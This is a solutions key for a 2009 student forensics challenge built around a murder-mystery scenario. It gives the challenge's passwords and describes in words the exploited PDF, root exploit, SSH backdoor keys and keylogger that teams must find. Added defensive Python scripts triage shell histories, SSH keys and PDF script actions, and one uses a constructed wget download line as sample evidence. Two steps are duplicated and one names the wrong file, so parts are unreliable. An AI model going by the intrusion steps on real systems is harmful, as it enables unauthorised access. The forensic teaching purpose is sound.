
CSAW 2009 High School Forensics Challenge Qualifying Round Solutions

Efstratios Gavas egavas@isis.poly.edu

Storyline
The NYU-Poly Police (NPP) needs your help to solve a murder. After responding to reports of screaming in the area, the NPP discovered Johnny Muzic dead in his office. Johnny Muzic was the executive at the newly-founded NYU-Poly ISIS Records, and has been seen hanging out with known criminals. Our investigation revealed that the company was about to release a new album by rock star Taylor Shift. During questioning Taylor told the NPP that Johnny had the latest cut of her new album, but we did not find the album anywhere in the office. Additionally, she told the NPP she believes Johnny and his business partner, Vikram Rekorder, have been arguing over her new role in the company. Vikram can not be found, and is wanted for questioning. Vikram's aid, Efstratios Gavas, was questioned, but only produced some network data. He knew nothing else. The network data was taken from two separate machines. Therefore, the two times are not synchronized and the relative time between the two is off. However, both datasets are from October 14.

Additional Evidence
The NPP has discovered a Twitter account which is associated with Mr. Muzic (http://twitter.com/jmuzic09). The NPP believes this is important new evidence and should be considered in your final report.

Executive Summary of Challenge


Through the course of the investigation, the team should have discovered that Vikram was not the killer, but actually had been kidnapped. This was discovered by uncovering the following message steganographically hidden in an online image: "This is Vikram. I have been abducted by some NYU Poly CSAW thugs. Please contact the authorities. I don't know if I will be able to communicate again."

Related Links
http://www.poly.edu/csaw-forensics
http://www.poly.edu/csaw-forensics#faq

Challenge Solutions
1. Acquire jmuzic account password
Description: Using a password cracking tool to get the jmuzic account password. The password is muzic.
Difficulty: Medium

2. Gain access to the jmuzic account
Description: Reset the password to gain access to the jmuzic account.
Difficulty: Easy

3. Identify msf.pdf as exploited pdf
Description: Identify the msf.pdf file as being exploited; it opens a listener port when viewed.
Difficulty: Medium

4. Discover isis.poly.edu/~vrekorder
Description: Using jmuzic's history file, observe the download of enlight.tgz to discover vrekorder's public website at isis.poly.edu/~vrekorder.
Difficulty: Medium

5. Discover isis.poly.edu/~vrekorder
Description: Using jmuzic's history file, observe the download of enlight.tgz to discover vrekorder's public website at isis.poly.edu/~vrekorder.
Difficulty: Medium

6. Discover Facebook pages, and parkinglot image
Description: Using jmuzic's history file, observe the download of enlight.tgz to discover vrekorder's public website at isis.poly.edu/~vrekorder. Discover the Facebook pages, and the parkinglot image.
Difficulty: Medium

7. Find added ssh authorized key for jmuzic account
Description: Find the authorized key that allows remote access to the jmuzic account without a password.
Difficulty: Medium

8. Extract enlight.tgz file
Description: Extract enlight.tgz.
Difficulty: Easy

9. Identify run null exploit.sh used in privilege escalation
Description: Identify the exploit code from the enlight.tgz file which allows local root privilege escalation.
Difficulty: Medium

10. Find added ssh authorized key for root account
Description: Find the authorized key that allows remote access to the root account without a password.
Difficulty: Medium

11. Find .lkl directory
Description: Using root's history file, find the .lkl directory in the /root directory.
Difficulty: Easy

12. Identify lkl keylogger directory as a keylogger
Description: Identify the contents of /root/lkl as a keylogger.
Difficulty: Medium

13. Decrypt taylor.tc, discover contract and songs
Description: Decrypt /home/jmuzic/taylor.tc using TrueCrypt and the password from the Twitter message. The password is TAYLOR. Discover the contract and songs.
Difficulty: Medium

14. Decrypt jmuzic.tc, discover gambling spreadsheets
Description: Decrypt /home/jmuzic/taylor.tc using TrueCrypt and the password from the Twitter message. The password is thisisagoodpassword. Discover the gambling spreadsheets, including account information on sheet2 of Game2.ods.
Difficulty: Medium

15. Discover isis.poly.edu~vrekorder/picture/ directory
Description: From packet #1223 in the pcap.evening evidence file, discover the hidden directory isis.poly.edu~vrekorder/picture/.
Difficulty: Medium

16. Discover isis.poly.edu~vrekorder/picture/ directory
Description: From packet #1223 in the pcap.evening evidence file, discover the hidden directory isis.poly.edu~vrekorder/picture/.
Difficulty: Medium

17. Observe successful brute force on vrekorder account
Description: From the pcap.morning evidence file, discover the successful brute force attack on the vrekorder account.
Difficulty: Medium

18. Gain access to isis.poly.edu~vrekorder/picture/ directory
Description: Gain access to the isis.poly.edu~vrekorder/picture/ directory by using information gathered from the Facebook pages. UID: vrekorder PWD: parkinglot
Difficulty: Hard

19. Extract hidden message from isis.poly.edu~vrekorder/picture/2009-10-1415.21.22.jpg
Description: Extract the hidden message from the isis.poly.edu~vrekorder/picture/2009-10-1415.21.22.jpg file by using information previously gathered. PWD: parkinglot. The message is as follows: "This is Vikram. I have been abducted by some NYU Poly CSAW thugs. Please contact the authorities. I don't know if I will be able to communicate again. VR"
Difficulty: Hard
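Steps 4, 7, 10 and 11 are all host-side triage of the same kind: read each account's shell history for downloads, list every authorized_keys entry, and look for dot-directories that do not belong in a home. The following script is an added example (not the challenge's tooling or the NPP's) that performs those three checks over a mounted filesystem image and also flags a key blob that appears under more than one account, which ties a user-level and a root-level backdoor to the same actor. The evidence tree it builds in a temporary directory is constructed for the example; the key blobs, comments and history lines are made up and are not the challenge's data.

```python
"""Offline triage of a mounted Linux filesystem image: shell-history downloads,
SSH authorized_keys entries, and unusual dot-directories in home directories.
Added example, not the challenge's own tooling; the evidence tree is constructed."""
import re
import tempfile
from pathlib import Path

# Constructed sample evidence tree (all contents are made up for this example).
SAMPLE_TREE = {
    "home/jmuzic/.bash_history": (
        "ls\nwget http://isis.poly.edu/~vrekorder/enlight.tgz\ntar xzf enlight.tgz\n"
    ),
    "home/jmuzic/.ssh/authorized_keys": (
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0example jmuzic@laptop\n"
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDintruder intruder@example\n"
    ),
    "root/.bash_history": "cd /root/.lkl\n./lkl -l -k -o log\n",
    "root/.ssh/authorized_keys": (
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDintruder intruder@example\n"
    ),
    "root/.lkl/lkl": "",
}

DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b.*?((?:https?|ftp)://\S+)")
USUAL_DOTDIRS = {".ssh", ".cache", ".config", ".local", ".gnupg", ".mozilla"}


def build_sample_tree(base: Path) -> Path:
    """Write the constructed tree under base, mimicking a mounted image root."""
    for rel, content in SAMPLE_TREE.items():
        path = base / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)
    return base


def account_dirs(root: Path):
    """Yield (account, home_dir) for root and each directory under /home."""
    if (root / "root").is_dir():
        yield "root", root / "root"
    home = root / "home"
    if home.is_dir():
        for d in sorted(home.iterdir()):
            if d.is_dir():
                yield d.name, d


def history_downloads(root: Path):
    """Return [(account, url)] for wget/curl lines found in each shell history."""
    found = []
    for account, home in account_dirs(root):
        hist = home / ".bash_history"
        if hist.is_file():
            for line in hist.read_text(errors="replace").splitlines():
                m = DOWNLOAD_RE.search(line)
                if m:
                    found.append((account, m.group(1)))
    return found


def authorized_keys(root: Path):
    """Return {account: [(key_type, key_blob, comment)]} from every authorized_keys file."""
    keys = {}
    for account, home in account_dirs(root):
        ak = home / ".ssh" / "authorized_keys"
        if not ak.is_file():
            continue
        entries = []
        for line in ak.read_text(errors="replace").splitlines():
            parts = line.split()
            if not parts or parts[0].startswith("#"):
                continue
            # Optional options field may precede the key type; locate the type token.
            idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-"))), None)
            if idx is None or idx + 1 >= len(parts):
                continue
            comment = " ".join(parts[idx + 2:]) or "(no comment)"
            entries.append((parts[idx], parts[idx + 1], comment))
        keys[account] = entries
    return keys


def shared_keys(keys_by_account):
    """Flag a key blob present in more than one account's authorized_keys."""
    seen = {}
    for account, entries in keys_by_account.items():
        for _ktype, blob, comment in entries:
            seen.setdefault(blob, (comment, []))[1].append(account)
    return [(c, sorted(a)) for c, a in seen.values() if len(a) > 1]


def hidden_dirs(root: Path):
    """Return [(account, name)] for dot-directories beyond the usual ones."""
    return [(account, d.name) for account, home in account_dirs(root)
            for d in sorted(home.iterdir())
            if d.is_dir() and d.name.startswith(".") and d.name not in USUAL_DOTDIRS]


def triage(root: Path) -> dict:
    keys = authorized_keys(root)
    return {
        "downloads": history_downloads(root),
        "keys": {a: [(t, c) for t, _b, c in e] for a, e in keys.items()},
        "shared_keys": shared_keys(keys),
        "hidden_dirs": hidden_dirs(root),
    }


def run_sample() -> dict:
    """Build the constructed tree in a temp dir and triage it."""
    return triage(build_sample_tree(Path(tempfile.mkdtemp(prefix="evidence_"))))


if __name__ == "__main__":
    for section, findings in run_sample().items():
        print(section, findings)
```

On a real image point `triage()` at the mount point instead of the constructed tree, and treat history files as an incomplete record: a shell history only records what was typed interactively, and it can be truncated or cleared, so confirm downloads against the network captures as the challenge does.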
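Step 3 asks the team to recognise msf.pdf as a weaponised document. The confirming evidence on the page is dynamic (a listener port opens when it is viewed); the script below is an added example, not the challenge's tooling, of the static check a triage analyst would run first: count PDF name tokens that auto-trigger (/OpenAction, /AA) and that execute something (/JavaScript, /JS, /Launch), after undoing the `#xx` hex escaping that PDF names allow, since `/J#61vaScript` is the same name as `/JavaScript` and a plain string search would miss it. The two PDFs it scans are minimal constructed samples, not msf.pdf.

```python
"""Static triage of a PDF for auto-executing content combined with script or launch actions.
Added example; the sample PDFs are constructed and are not the challenge's msf.pdf."""
import re

RISKY_NAMES = ("/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch", "/EmbeddedFile")
# A PDF name token: '/' followed by characters up to the next whitespace or delimiter.
NAME_RE = re.compile(rb"/[^\s/<>\[\]()]+")


def decode_name(token: bytes) -> bytes:
    """Undo PDF name hex escapes: /J#61vaScript denotes the same name as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), token)


def count_risky_names(data: bytes) -> dict:
    """Count risky names in the uncompressed objects of a PDF (streams are not inflated)."""
    counts = {}
    for m in NAME_RE.finditer(data):
        name = decode_name(m.group(0)).decode("latin-1")
        if name in RISKY_NAMES:
            counts[name] = counts.get(name, 0) + 1
    return counts


def is_suspicious(data: bytes) -> bool:
    """An auto-trigger plus an action that runs code is the pattern worth escalating."""
    counts = count_risky_names(data)
    trigger = "/OpenAction" in counts or "/AA" in counts
    action = any(n in counts for n in ("/JavaScript", "/JS", "/Launch"))
    return trigger and action


# Constructed minimal PDFs for the example; the escaped name hides /JavaScript from naive grep.
MALICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, pdf in (("constructed malicious", MALICIOUS_PDF), ("constructed benign", BENIGN_PDF)):
        print(label, count_risky_names(pdf), "suspicious:", is_suspicious(pdf))
```

This scan only sees names in uncompressed objects; exploit PDFs commonly hide the action dictionary inside a FlateDecode stream or an object stream, so inflate streams (zlib) or use a full PDF parser before trusting a clean result, and keep the observed listener port as the decisive indicator.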
